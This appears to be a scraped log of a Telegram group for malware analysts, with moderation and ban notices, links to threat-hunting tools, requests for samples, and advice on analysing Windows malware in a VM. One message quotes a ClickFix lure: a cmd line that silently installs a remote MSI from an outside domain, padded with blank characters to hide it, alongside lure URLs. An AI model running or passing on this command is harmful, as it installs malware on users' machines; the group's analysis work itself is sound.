9373
Group for Malware Analysts. Pinned message with resources and rules: https://t.me/MalwareResearch/38033
User 得到 has 1/3 warnings; be careful!
Reason:
stay on topic
Here is the video showing how Garuda can perform AI powered threat hunting when integrated with LLMs:
https://youtu.be/Sk_c5w1CEiY
https://github.com/vxunderground/MalwareSourceCode/tree/main/Android/Android.Ermac.3
Читать полностью…
May I ask to download this file from VT? Thanks a lot
https://www.virustotal.com/gui/file/175d4adc5fc0b0d8eb4b7d93b6f9694e4a3089e4ed4c59a2828d0667a9992aaa/detection
the code that will download the first zipped file
Читать полностью…
seems like the final downloads not available
2 zipped files
New FedBan
Fed: Libra's Empire
FedAdmin: alex 27
User: Crypto Rex
User ID: 7864280650
Reason: spam
https://www.microsoft.com/en-us/research/blog/project-ire-autonomously-identifies-malware-at-scale/
Project Ire, automates what is considered the gold standard in malware classification: fully reverse engineering a software file without any clues about its origin or purpose. It uses decompilers and other tools, reviews their output, and determines whether the software is malicious or benign
User ~❤️ has 1/3 warnings; be careful!
Reason:
stay on topic
Any recommendation on how to analyze a windows malware detected and I want to analyze its behavior
Thanks
So does it automatically assume any pdf with qr in it as phishing?
Читать полностью…
Yeah. Quite unlike almost a decade or two ago...
Читать полностью…
New FedBan
Fed: Libra's Empire
FedAdmin: alex 27
User: Beatriz Arcos
User ID: 7357787293
Reason: None given.
New FedBan
Fed: Libra's Empire
FedAdmin: alex 27
User: Olympia Miller
User ID: 8233018498
Reason: smap
I’m excited to share that At DEF CON, I released the Garuda Threat Hunting Framework — a tool designed to empower defenders with manual threat hunting and detection capabilities.
Explore the framework: https://github.com/monnappa22/Garuda-framework
In case you missed it: Garuda can also be integrated with LLMs to perform AI-powered autonomous threat hunting.
Watch the demo here: https://youtu.be/Sk_c5w1CEiY
Is this the source of emarc ? If so, it is on vx underground
Читать полностью…
yes
sometimes country ip and other factors restrictions (usaully redireted to google.com)
User Александр has 1/3 warnings; be careful!
Reason:
read rules
Click Fix samples via telegram mini apps ( fake safeguard )
sample:
/channel/OxAA_Science_tg/4
cmd /c start msiexec /q /i https://b9w2.top/safeguard.msi & rem [✓] Alternate Verification Telegramㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤ
https://o5e.pages.dev/?g=1298Читать полностью…
https://o5e.pages.dev/?g=981
Thanks folks I used hybrid analysis as I was in rush for more context but I will discover those options
Читать полностью…
New FedBan
Fed: Libra's Empire
FedAdmin: alex 27
User: 𝙂⚡𝙧𝙤 𝙂𝙝𝙤𝙨𝙩
User ID: 5342471938
Reason: spam
Get a VM. Install monitoring and analysis tools (procmon, procexplorer, autoruns, wireshark, rootkit unhooker - or any alternatives of your choice). Account for antisandbox/antidebug as well as the execution chain and detonate the payload. You should see the behaviour in monitoring tools. You might also want to take a memory dump of the system or specific proccesses.
Читать полностью…
It floods the SIEM with so many cases after it auto zaps them 😏
Читать полностью…
Speaking of which, after MS disabled macros by default, there are hardly any Office documents to analyze
Читать полностью…
MS Defender is surprisingly good at detecting the former that I don't have to do anything. I feel my job is at risk 👀
Читать полностью…